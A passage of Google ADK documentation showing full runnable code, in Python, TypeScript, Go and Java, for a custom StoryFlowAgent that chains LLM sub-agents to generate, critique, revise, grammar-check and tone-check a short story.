  logger.log(Level.INFO, () -> String.format("Initial session state: %s", session.state()));

  session.state().put("topic", userTopic); // Update the state in the retrieved session
  logger.log(Level.INFO, () -> String.format("Updated session state topic to: %s", userTopic));

  Content userMessage = Content.fromParts(Part.fromText("Generate a story about: " + userTopic));
  // Use the modified session object for the run
  Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

  final String[] finalResponse = {"No final response captured."};

  eventStream.blockingForEach(
      event -> {
        if (event.finalResponse() && event.content().isPresent()) {
          String author = event.author() != null ? 
event.author() : "UNKNOWN_AUTHOR";
          Optional<String> textOpt =
              event
                  .content()
                  .flatMap(Content::parts)
                  .filter(parts -> !parts.isEmpty())
                  .map(parts -> parts.get(0).text().orElse(""));

          logger.log(Level.INFO, () -> String.format("Potential final response from [%s]: %s", author, textOpt.orElse("N/A")));
          textOpt.ifPresent(text -> finalResponse[0] = text);
        }
      });

  System.out.println("\n--- Agent Interaction Result ---");
  System.out.println("Agent Final Response: " + finalResponse[0]);

  // Retrieve session again to see the final state after the run
  Session finalSession =
      runner
          .sessionService()
          .getSession(APP_NAME, USER_ID, SESSION_ID, Optional.empty())
          .blockingGet();

  assert finalSession != null;
  System.out.println("Final Session State:" + finalSession.state());
  System.out.println("-------------------------------\n");
}
```

*(Note: The full runnable code, including imports and execution logic, can be found below.)*

______________________________________________________________________

## Full Code Example

Storyflow Agent

```python
# Full runnable code for the StoryFlowAgent example
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging from typing import AsyncGenerator from typing_extensions import override from google.adk.agents import LlmAgent, BaseAgent, LoopAgent, SequentialAgent from google.adk.agents.invocation_context import InvocationContext from google.genai import types from google.adk.sessions import InMemorySessionService from google.adk.runners import Runner from google.adk.events import Event from pydantic import BaseModel, Field # --- Constants --- APP_NAME = "story_app" USER_ID = "12345" SESSION_ID = "123344" GEMINI_2_FLASH = "gemini-2.0-flash" # --- Configure Logging --- logging.basicConfig(level=logging.INFO) logger = logging.getLogger(__name__) # --- Custom Orchestrator Agent --- class StoryFlowAgent(BaseAgent): """ Custom agent for a story generation and refinement workflow. This agent orchestrates a sequence of LLM agents to generate a story, critique it, revise it, check grammar and tone, and potentially regenerate the story if the tone is negative. """ # --- Field Declarations for Pydantic --- # Declare the agents passed during initialization as class attributes with type hints story_generator: LlmAgent critic: LlmAgent reviser: LlmAgent grammar_check: LlmAgent tone_check: LlmAgent loop_agent: LoopAgent sequential_agent: SequentialAgent # model_config allows setting Pydantic configurations if needed, e.g., arbitrary_types_allowed model_config = {"arbitrary_types_allowed": True} def __init__( self, name: str, story_generator: LlmAgent, critic: LlmAgent, reviser: LlmAgent, grammar_check: LlmAgent, tone_check: LlmAgent, ): """ Initializes the StoryFlowAgent. Args: name: The name of the agent. story_generator: An LlmAgent to generate the initial story. critic: An LlmAgent to critique the story. reviser: An LlmAgent to revise the story based on criticism. grammar_check: An LlmAgent to check the grammar. tone_check: An LlmAgent to analyze the tone. 
""" # Create internal agents *before* calling super().__init__ loop_agent = LoopAgent( name="CriticReviserLoop", sub_agents=[critic, reviser], max_iterations=2 ) sequential_agent = SequentialAgent( name="PostProcessing", sub_agents=[grammar_check, tone_check] ) # Define the sub_agents list for the framework sub_agents_list = [ story_generator, loop_agent, sequential_agent, ] # Pydantic will validate and assign them based on the class annotations. super().__init__( name=name, story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, loop_agent=loop_agent, sequential_agent=sequential_agent, sub_agents=sub_agents_list, # Pass the sub_agents list directly ) @override async def _run_async_impl( self, ctx: InvocationContext ) -> AsyncGenerator[Event, None]: """ Implements the custom orchestration logic for the story workflow. Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). """ logger.info(f"[{self.name}] Starting story generation workflow.") # 1. Initial Story Generation logger.info(f"[{self.name}] Running StoryGenerator...") async for event in self.story_generator.run_async(ctx): logger.info(f"[{self.name}] Event from StoryGenerator: {event.model_dump_json(indent=2, exclude_none=True)}") yield event # Check if story was generated before proceeding if "current_story" not in ctx.session.state or not ctx.session.state["current_story"]: logger.error(f"[{self.name}] Failed to generate initial story. Aborting workflow.") return # Stop processing if initial story failed logger.info(f"[{self.name}] Story state after generator: {ctx.session.state.get('current_story')}") # 2. 
Critic-Reviser Loop logger.info(f"[{self.name}] Running CriticReviserLoop...") # Use the loop_agent instance attribute assigned during init async for event in self.loop_agent.run_async(ctx): logger.info(f"[{self.name}] Event from CriticReviserLoop: {event.model_dump_json(indent=2, exclude_none=True)}") yield event logger.info(f"[{self.name}] Story state after loop: {ctx.session.state.get('current_story')}") # 3. Sequential Post-Processing (Grammar and Tone Check) logger.info(f"[{self.name}] Running PostProcessing...") # Use the sequential_agent instance attribute assigned during init async for event in self.sequential_agent.run_async(ctx): logger.info(f"[{self.name}] Event from PostProcessing: {event.model_dump_json(indent=2, exclude_none=True)}") yield event # 4. Tone-Based Conditional Logic tone_check_result = ctx.session.state.get("tone_check_result") logger.info(f"[{self.name}] Tone check result: {tone_check_result}") if tone_check_result == "negative": logger.info(f"[{self.name}] Tone is negative. Regenerating story...") async for event in self.story_generator.run_async(ctx): logger.info(f"[{self.name}] Event from StoryGenerator (Regen): {event.model_dump_json(indent=2, exclude_none=True)}") yield event else: logger.info(f"[{self.name}] Tone is not negative. Keeping current story.") pass logger.info(f"[{self.name}] Workflow finished.") # --- Define the individual LLM agents --- story_generator = LlmAgent( name="StoryGenerator", model=GEMINI_2_FLASH, instruction="""You are a story writer. Write a short story (around 100 words), on the following topic: {topic}""", input_schema=None, output_key="current_story", # Key for storing output in session state ) critic = LlmAgent( name="Critic", model=GEMINI_2_FLASH, instruction="""You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. 
Focus on plot or character.""", input_schema=None, output_key="criticism", # Key for storing criticism in session state ) reviser = LlmAgent( name="Reviser", model=GEMINI_2_FLASH, instruction="""You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.""", input_schema=None, output_key="current_story", # Overwrites the original story ) grammar_check = LlmAgent( name="GrammarCheck", model=GEMINI_2_FLASH, instruction="""You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.""", input_schema=None, output_key="grammar_suggestions", ) tone_check = LlmAgent( name="ToneCheck", model=GEMINI_2_FLASH, instruction="""You are a tone analyzer. Analyze the tone of the story provided: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.""", input_schema=None, output_key="tone_check_result", # This agent's output determines the conditional flow ) # --- Create the custom agent instance --- story_flow_agent = StoryFlowAgent( name="StoryFlowAgent", story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, ) INITIAL_STATE = {"topic": "a brave kitten exploring a haunted house"} # --- Setup Runner and Session --- async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID, state=INITIAL_STATE) logger.info(f"Initial session state: {session.state}") runner = Runner( agent=story_flow_agent, # Pass the custom orchestrator agent app_name=APP_NAME, session_service=session_service ) return session_service, runner # --- Function to Interact with the Agent --- async def 
call_agent_async(user_input_topic: str): """ Sends a new topic to the agent (overwriting the initial one if needed) and runs the workflow. """ session_service, runner = await setup_session_and_runner() current_session = session_service.sessions[APP_NAME][USER_ID][SESSION_ID] current_session.state["topic"] = user_input_topic logger.info(f"Updated session state topic to: {user_input_topic}") content = types.Content(role='user', parts=[types.Part(text=f"Generate a story about the preset topic.")]) events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) final_response = "No final response captured." async for event in events: if event.is_final_response() and event.content and event.content.parts: logger.info(f"Potential final response from [{event.author}]: {event.content.parts[0].text}") final_response = event.content.parts[0].text print("\n--- Agent Interaction Result ---") print("Agent Final Response: ", final_response) final_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) print("Final Session State:") import json print(json.dumps(final_session.state, indent=2)) print("-------------------------------\n") # --- Run the Agent --- # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("a lonely robot finding a friend in a junkyard") ``` ```typescript // Full runnable code for the StoryFlowAgent example /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. 
* You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, BaseAgent, LoopAgent, SequentialAgent, InMemoryRunner, InvocationContext, Event, isFinalResponse, } from '@google/adk'; import { createUserContent } from "@google/genai"; // --- Constants --- const APP_NAME = "story_app_ts"; const USER_ID = "12345"; const SESSION_ID = "123344_ts"; const GEMINI_MODEL = "gemini-2.5-flash"; // --- Custom Orchestrator Agent --- class StoryFlowAgent extends BaseAgent { // --- Property Declarations for TypeScript --- private storyGenerator: LlmAgent; private critic: LlmAgent; private reviser: LlmAgent; private grammarCheck: LlmAgent; private toneCheck: LlmAgent; private loopAgent: LoopAgent; private sequentialAgent: SequentialAgent; constructor( name: string, storyGenerator: LlmAgent, critic: LlmAgent, reviser: LlmAgent, grammarCheck: LlmAgent, toneCheck: LlmAgent ) { // Create internal composite agents const loopAgent = new LoopAgent({ name: "CriticReviserLoop", subAgents: [critic, reviser], maxIterations: 2, }); const sequentialAgent = new SequentialAgent({ name: "PostProcessing", subAgents: [grammarCheck, toneCheck], }); // Define the sub-agents for the framework to know about const subAgentsList = [ storyGenerator, loopAgent, sequentialAgent, ]; // Call the parent constructor super({ name, subAgents: subAgentsList, }); // Assign agents to class properties for use in the custom run logic this.storyGenerator = storyGenerator; this.critic = critic; this.reviser = reviser; this.grammarCheck = grammarCheck; this.toneCheck = toneCheck; this.loopAgent = loopAgent; this.sequentialAgent = sequentialAgent; } // Implements 
the custom orchestration logic for the story workflow. async* runLiveImpl(ctx: InvocationContext): AsyncGenerator { yield* this.runAsyncImpl(ctx); } // Implements the custom orchestration logic for the story workflow. async* runAsyncImpl(ctx: InvocationContext): AsyncGenerator { console.log(`[${this.name}] Starting story generation workflow.`); // 1. Initial Story Generation console.log(`[${this.name}] Running StoryGenerator...`); for await (const event of this.storyGenerator.runAsync(ctx)) { console.log(`[${this.name}] Event from StoryGenerator: ${JSON.stringify(event, null, 2)}`); yield event; } // Check if the story was generated before proceeding if (!ctx.session.state["current_story"]) { console.error(`[${this.name}] Failed to generate initial story. Aborting workflow.`); return; // Stop processing } console.log(`[${this.name}] Story state after generator: ${ctx.session.state['current_story']}`); // 2. Critic-Reviser Loop console.log(`[${this.name}] Running CriticReviserLoop...`); for await (const event of this.loopAgent.runAsync(ctx)) { console.log(`[${this.name}] Event from CriticReviserLoop: ${JSON.stringify(event, null, 2)}`); yield event; } console.log(`[${this.name}] Story state after loop: ${ctx.session.state['current_story']}`); // 3. Sequential Post-Processing (Grammar and Tone Check) console.log(`[${this.name}] Running PostProcessing...`); for await (const event of this.sequentialAgent.runAsync(ctx)) { console.log(`[${this.name}] Event from PostProcessing: ${JSON.stringify(event, null, 2)}`); yield event; } // 4. Tone-Based Conditional Logic const toneCheckResult = ctx.session.state["tone_check_result"] as string; console.log(`[${this.name}] Tone check result: ${toneCheckResult}`); if (toneCheckResult === "negative") { console.log(`[${this.name}] Tone is negative. 
Regenerating story...`); for await (const event of this.storyGenerator.runAsync(ctx)) { console.log(`[${this.name}] Event from StoryGenerator (Regen): ${JSON.stringify(event, null, 2)}`); yield event; } } else { console.log(`[${this.name}] Tone is not negative. Keeping current story.`); } console.log(`[${this.name}] Workflow finished.`); } } // --- Define the individual LLM agents --- const storyGenerator = new LlmAgent({ name: "StoryGenerator", model: GEMINI_MODEL, instruction: `You are a story writer. Write a short story (around 100 words), on the following topic: {topic}`, outputKey: "current_story", }); const critic = new LlmAgent({ name: "Critic", model: GEMINI_MODEL, instruction: `You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.`, outputKey: "criticism", }); const reviser = new LlmAgent({ name: "Reviser", model: GEMINI_MODEL, instruction: `You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.`, outputKey: "current_story", // Overwrites the original story }); const grammarCheck = new LlmAgent({ name: "GrammarCheck", model: GEMINI_MODEL, instruction: `You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.`, outputKey: "grammar_suggestions", }); const toneCheck = new LlmAgent({ name: "ToneCheck", model: GEMINI_MODEL, instruction: `You are a tone analyzer. Analyze the tone of the story provided: {current_story}. 
Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.`, outputKey: "tone_check_result", }); // --- Create the custom agent instance --- const storyFlowAgent = new StoryFlowAgent( "StoryFlowAgent", storyGenerator, critic, reviser, grammarCheck, toneCheck ); const INITIAL_STATE = { "topic": "a brave kitten exploring a haunted house" }; // --- Setup Runner and Session --- async function setupRunnerAndSession() { const runner = new InMemoryRunner({ agent: storyFlowAgent, appName: APP_NAME, }); const session = await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, state: INITIAL_STATE, }); console.log(`Initial session state: ${JSON.stringify(session.state, null, 2)}`); return runner; } // --- Function to Interact with the Agent --- async function callAgent(runner: InMemoryRunner, userInputTopic: string) { const currentSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); if (!currentSession) { return; } // Update the state with the new topic for this run currentSession.state["topic"] = userInputTopic; console.log(`Updated session state topic to: ${userInputTopic}`); let finalResponse = "No final response captured."; for await (const event of runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID, newMessage: createUserContent(`Generate a story about: ${userInputTopic}`) })) { if (isFinalResponse(event) && event.content?.parts?.length) { console.log(`Potential final response from [${event.author}]: ${event.content.parts.map(part => part.text ?? '').join('')}`); finalResponse = event.content.parts.map(part => part.text ?? 
        '').join('');
    }
  }

  const finalSession = await runner.sessionService.getSession({
    appName: APP_NAME,
    userId: USER_ID,
    sessionId: SESSION_ID
  });

  console.log("\n--- Agent Interaction Result ---");
  console.log("Agent Final Response: ", finalResponse);
  console.log("Final Session State:");
  console.log(JSON.stringify(finalSession?.state, null, 2));
  console.log("-------------------------------\n");
}

// --- Run the Agent ---
async function main() {
  const runner = await setupRunnerAndSession();
  await callAgent(runner, "a lonely robot finding a friend in a junkyard");
}

main();
```

```go
// Full runnable code for the StoryFlowAgent example
package main

import (
	"context"
	"fmt"
	"iter"
	"log"

	"google.golang.org/adk/agent/workflowagents/loopagent"
	"google.golang.org/adk/agent/workflowagents/sequentialagent"

	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/model/gemini"
	"google.golang.org/adk/runner"
	"google.golang.org/adk/session"
	"google.golang.org/genai"
)

// StoryFlowAgent is a custom agent that orchestrates a story generation workflow.
// It encapsulates the logic of running sub-agents in a specific sequence.
type StoryFlowAgent struct {
	storyGenerator     agent.Agent
	revisionLoopAgent  agent.Agent
	postProcessorAgent agent.Agent
}

// NewStoryFlowAgent creates and configures the entire custom agent workflow.
// It takes individual LLM agents as input and internally creates the necessary
// workflow agents (loop, sequential), returning the final orchestrator agent.
func NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck agent.Agent, ) (agent.Agent, error) { loopAgent, err := loopagent.New(loopagent.Config{ MaxIterations: 2, AgentConfig: agent.Config{ Name: "CriticReviserLoop", SubAgents: []agent.Agent{critic, reviser}, }, }) if err != nil { return nil, fmt.Errorf("failed to create loop agent: %w", err) } sequentialAgent, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: "PostProcessing", SubAgents: []agent.Agent{grammarCheck, toneCheck}, }, }) if err != nil { return nil, fmt.Errorf("failed to create sequential agent: %w", err) } // The StoryFlowAgent struct holds the agents needed for the Run method. orchestrator := &StoryFlowAgent{ storyGenerator: storyGenerator, revisionLoopAgent: loopAgent, postProcessorAgent: sequentialAgent, } // agent.New creates the final agent, wiring up the Run method. return agent.New(agent.Config{ Name: "StoryFlowAgent", Description: "Orchestrates story generation, critique, revision, and checks.", SubAgents: []agent.Agent{storyGenerator, loopAgent, sequentialAgent}, Run: orchestrator.Run, }) } // Run defines the custom execution logic for the StoryFlowAgent. func (s *StoryFlowAgent) Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { // Stage 1: Initial Story Generation for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story generator failed: %w", err)) return } if !yield(event, nil) { return } } // Check if story was generated before proceeding currentStory, err := ctx.Session().State().Get("current_story") if err != nil || currentStory == "" { log.Println("Failed to generate initial story. 
Aborting workflow.") return } // Stage 2: Critic-Reviser Loop for event, err := range s.revisionLoopAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("loop agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 3: Post-Processing for event, err := range s.postProcessorAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("sequential agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 4: Conditional Regeneration toneResult, err := ctx.Session().State().Get("tone_check_result") if err != nil { log.Printf("Could not read tone_check_result from state: %v. Assuming tone is not negative.", err) return } if tone, ok := toneResult.(string); ok && tone == "negative" { log.Println("Tone is negative. Regenerating story...") for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story regeneration failed: %w", err)) return } if !yield(event, nil) { return } } } else { log.Println("Tone is not negative. Keeping current story.") } } } const ( modelName = "gemini-2.0-flash" appName = "story_app" userID = "user_12345" ) func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // --- Define the individual LLM agents --- storyGenerator, err := llmagent.New(llmagent.Config{ Name: "StoryGenerator", Model: model, Description: "Generates the initial story.", Instruction: "You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic}", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create StoryGenerator agent: %v", err) } critic, err := llmagent.New(llmagent.Config{ Name: "Critic", Model: model, Description: "Critiques the story.", Instruction: "You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. 
Focus on plot or character.", OutputKey: "criticism", }) if err != nil { log.Fatalf("Failed to create Critic agent: %v", err) } reviser, err := llmagent.New(llmagent.Config{ Name: "Reviser", Model: model, Description: "Revises the story based on criticism.", Instruction: "You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story.", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create Reviser agent: %v", err) } grammarCheck, err := llmagent.New(llmagent.Config{ Name: "GrammarCheck", Model: model, Description: "Checks grammar and suggests corrections.", Instruction: "You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.", OutputKey: "grammar_suggestions", }) if err != nil { log.Fatalf("Failed to create GrammarCheck agent: %v", err) } toneCheck, err := llmagent.New(llmagent.Config{ Name: "ToneCheck", Model: model, Description: "Analyzes the tone of the story.", Instruction: "You are a tone analyzer. Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.", OutputKey: "tone_check_result", }) if err != nil { log.Fatalf("Failed to create ToneCheck agent: %v", err) } // Instantiate the custom agent, which encapsulates the workflow agents. 
storyFlowAgent, err := NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck, ) if err != nil { log.Fatalf("Failed to create story flow agent: %v", err) } // --- Run the Agent --- sessionService := session.InMemoryService() initialState := map[string]any{ "topic": "a brave kitten exploring a haunted house", } sessionInstance, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, State: initialState, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } userTopic := "a lonely robot finding a friend in a junkyard" r, err := runner.New(runner.Config{ AppName: appName, Agent: storyFlowAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } input := genai.NewContentFromText("Generate a story about: "+userTopic, genai.RoleUser) events := r.Run(ctx, userID, sessionInstance.Session.ID(), input, agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, }) var finalResponse string for event, err := range events { if err != nil { log.Fatalf("An error occurred during agent execution: %v", err) } for _, part := range event.Content.Parts { // Accumulate text from all parts of the final response. 
			finalResponse += part.Text
		}
	}

	fmt.Println("\n--- Agent Interaction Result ---")
	fmt.Println("Agent Final Response: " + finalResponse)

	finalSession, err := sessionService.Get(ctx, &session.GetRequest{
		UserID:    userID,
		AppName:   appName,
		SessionID: sessionInstance.Session.ID(),
	})
	if err != nil {
		log.Fatalf("Failed to retrieve final session: %v", err)
	}

	fmt.Println("Final Session State:", finalSession.Session.State())
}
```

```java
// Full runnable code for the StoryFlowAgent example
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.BaseAgent;
import com.google.adk.agents.InvocationContext;
import com.google.adk.agents.LoopAgent;
import com.google.adk.agents.SequentialAgent;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.concurrent.ConcurrentHashMap;
import java.util.logging.Level;
import java.util.logging.Logger;

public class StoryFlowAgentExample extends BaseAgent {

  // --- Constants ---
  private static final String APP_NAME = "story_app";
  private static final String USER_ID = "user_12345";
  private static final String SESSION_ID = "session_123344";
  private static final String MODEL_NAME = "gemini-2.0-flash"; // Ensure this model is available

  private static final Logger logger = Logger.getLogger(StoryFlowAgentExample.class.getName());

  private final LlmAgent storyGenerator;
  private final LoopAgent loopAgent;
  private final SequentialAgent sequentialAgent;

  public StoryFlowAgentExample(
      String name, LlmAgent storyGenerator, LoopAgent loopAgent, SequentialAgent sequentialAgent) {
    super(
        name,
        "Orchestrates story generation, critique, revision, and checks.",
        List.of(storyGenerator, loopAgent, sequentialAgent),
        null,
        null);

    this.storyGenerator =
storyGenerator; this.loopAgent = loopAgent; this.sequentialAgent = sequentialAgent; } public static void main(String[] args) { // --- Define the individual LLM agents --- LlmAgent storyGenerator = LlmAgent.builder() .name("StoryGenerator") .model(MODEL_NAME) .description("Generates the initial story.") .instruction( """ You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic} """) .inputSchema(null) .outputKey("current_story") // Key for storing output in session state .build(); LlmAgent critic = LlmAgent.builder() .name("Critic") .model(MODEL_NAME) .description("Critiques the story.") .instruction( """ You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character. """) .inputSchema(null) .outputKey("criticism") // Key for storing criticism in session state .build(); LlmAgent reviser = LlmAgent.builder() .name("Reviser") .model(MODEL_NAME) .description("Revises the story based on criticism.") .instruction( """ You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story. """) .inputSchema(null) .outputKey("current_story") // Overwrites the original story .build(); LlmAgent grammarCheck = LlmAgent.builder() .name("GrammarCheck") .model(MODEL_NAME) .description("Checks grammar and suggests corrections.") .instruction( """ You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors. """) .outputKey("grammar_suggestions") .build(); LlmAgent toneCheck = LlmAgent.builder() .name("ToneCheck") .model(MODEL_NAME) .description("Analyzes the tone of the story.") .instruction( """ You are a tone analyzer. Analyze the tone of the story: {current_story}. 
Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise. """) .outputKey("tone_check_result") // This agent's output determines the conditional flow .build(); LoopAgent loopAgent = LoopAgent.builder() .name("CriticReviserLoop") .description("Iteratively critiques and revises the story.") .subAgents(critic, reviser) .maxIterations(2) .build(); SequentialAgent sequentialAgent = SequentialAgent.builder() .name("PostProcessing") .description("Performs grammar and tone checks sequentially.") .subAgents(grammarCheck, toneCheck) .build(); StoryFlowAgentExample storyFlowAgentExample = new StoryFlowAgentExample(APP_NAME, storyGenerator, loopAgent, sequentialAgent); // --- Run the Agent --- runAgent(storyFlowAgentExample, "a lonely robot finding a friend in a junkyard"); } // --- Function to Interact with the Agent --- // Sends a new topic to the agent (overwriting the initial one if needed) // and runs the workflow. 
  public static void runAgent(StoryFlowAgentExample agent, String userTopic) {
    // --- Setup Runner and Session ---
    InMemoryRunner runner = new InMemoryRunner(agent);

    Map<String, Object> initialState = new HashMap<>();
    initialState.put("topic", "a brave kitten exploring a haunted house");

    Session session =
        runner
            .sessionService()
            .createSession(APP_NAME, USER_ID, new ConcurrentHashMap<>(initialState), SESSION_ID)
            .blockingGet();
    logger.log(Level.INFO, () -> String.format("Initial session state: %s", session.state()));

    session.state().put("topic", userTopic); // Update the state in the retrieved session
    logger.log(Level.INFO, () -> String.format("Updated session state topic to: %s", userTopic));

    Content userMessage = Content.fromParts(Part.fromText("Generate a story about: " + userTopic));
    // Use the modified session object for the run
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    final String[] finalResponse = {"No final response captured."};

    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse() && event.content().isPresent()) {
            String author = event.author() != null ?
                event.author() : "UNKNOWN_AUTHOR";
            Optional<String> textOpt =
                event
                    .content()
                    .flatMap(Content::parts)
                    .filter(parts -> !parts.isEmpty())
                    .map(parts -> parts.get(0).text().orElse(""));

            logger.log(Level.INFO, () -> String.format("Potential final response from [%s]: %s", author, textOpt.orElse("N/A")));
            textOpt.ifPresent(text -> finalResponse[0] = text);
          }
        });

    System.out.println("\n--- Agent Interaction Result ---");
    System.out.println("Agent Final Response: " + finalResponse[0]);

    // Retrieve session again to see the final state after the run
    Session finalSession =
        runner
            .sessionService()
            .getSession(APP_NAME, USER_ID, SESSION_ID, Optional.empty())
            .blockingGet();

    assert finalSession != null;
    System.out.println("Final Session State:" + finalSession.state());
    System.out.println("-------------------------------\n");
  }

  private boolean isStoryGenerated(InvocationContext ctx) {
    Object currentStoryObj = ctx.session().state().get("current_story");
    return currentStoryObj != null && !String.valueOf(currentStoryObj).isEmpty();
  }

  @Override
  protected Flowable<Event> runAsyncImpl(InvocationContext invocationContext) {
    // Implements the custom orchestration logic for the story workflow.
    // Uses the agent fields assigned in the constructor (e.g., storyGenerator).
    logger.log(Level.INFO, () -> String.format("[%s] Starting story generation workflow.", name()));

    // Stage 1. Initial Story Generation
    Flowable<Event> storyGenFlow = runStage(storyGenerator, invocationContext, "StoryGenerator");

    // Stage 2: Critic-Reviser Loop (runs after story generation completes)
    Flowable<Event> criticReviserFlow = Flowable.defer(() -> {
      if (!isStoryGenerated(invocationContext)) {
        logger.log(Level.SEVERE,() -> String.format("[%s] Failed to generate initial story.
Aborting after StoryGenerator.", name())); return Flowable.empty(); // Stop further processing if no story } logger.log(Level.INFO, () -> String.format("[%s] Story state after generator: %s", name(), invocationContext.session().state().get("current_story"))); return runStage(loopAgent, invocationContext, "CriticReviserLoop"); }); // Stage 3: Post-Processing (runs after critic-reviser loop completes) Flowable postProcessingFlow = Flowable.defer(() -> { logger.log(Level.INFO, () -> String.format("[%s] Story state after loop: %s", name(), invocationContext.session().state().get("current_story"))); return runStage(sequentialAgent, invocationContext, "PostProcessing"); }); // Stage 4: Conditional Regeneration (runs after post-processing completes) Flowable conditionalRegenFlow = Flowable.defer(() -> { String toneCheckResult = (String) invocationContext.session().state().get("tone_check_result"); logger.log(Level.INFO, () -> String.format("[%s] Tone check result: %s", name(), toneCheckResult)); if ("negative".equalsIgnoreCase(toneCheckResult)) { logger.log(Level.INFO, () -> String.format("[%s] Tone is negative. Regenerating story...", name())); return runStage(storyGenerator, invocationContext, "StoryGenerator (Regen)"); } else { logger.log(Level.INFO, () -> String.format("[%s] Tone is not negative. 
Keeping current story.", name()));
        return Flowable.empty(); // No regeneration needed
      }
    });

    return Flowable.concatArray(storyGenFlow, criticReviserFlow, postProcessingFlow, conditionalRegenFlow)
        .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] Workflow finished.", name())));
  }

  // Helper method for a single agent run stage with logging
  private Flowable<Event> runStage(BaseAgent agentToRun, InvocationContext ctx, String stageName) {
    logger.log(Level.INFO, () -> String.format("[%s] Running %s...", name(), stageName));
    return agentToRun
        .runAsync(ctx)
        .doOnNext(event ->
            logger.log(Level.INFO,() -> String.format("[%s] Event from %s: %s", name(), stageName, event.toJson())))
        .doOnError(err ->
            logger.log(Level.SEVERE,
                String.format("[%s] Error in %s", name(), stageName), err))
        .doOnComplete(() ->
            logger.log(Level.INFO, () -> String.format("[%s] %s finished.", name(), stageName)));
  }

  @Override
  protected Flowable<Event> runLiveImpl(InvocationContext invocationContext) {
    return Flowable.error(new UnsupportedOperationException("runLive not implemented."));
  }
}
```

# LLM Agent

